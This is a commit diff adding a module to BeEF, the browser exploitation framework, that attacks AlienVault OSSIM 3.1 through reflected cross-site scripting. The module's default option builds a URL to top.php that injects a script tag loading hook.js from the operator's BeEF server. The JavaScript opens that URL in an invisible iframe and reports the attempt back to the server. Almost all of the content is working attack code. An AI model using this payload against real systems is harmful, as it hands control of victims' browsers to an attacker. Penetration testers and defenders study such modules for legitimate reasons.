Added AlienVault OSSIM 3.1 XSS module

modules/exploits/xss/alienvault_ossim_3.1_xss/command.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+	alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        alienvault_ossim_3_1_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "AlienVault OSSIM 3.1 XSS"
+            description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/20062/"
+            authors: ["bcoles", "muts"]
+            target:
+                working: ["ALL"]

modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Alienvault_ossim_3_1_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url=<script src='+hook_uri+'></script>'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end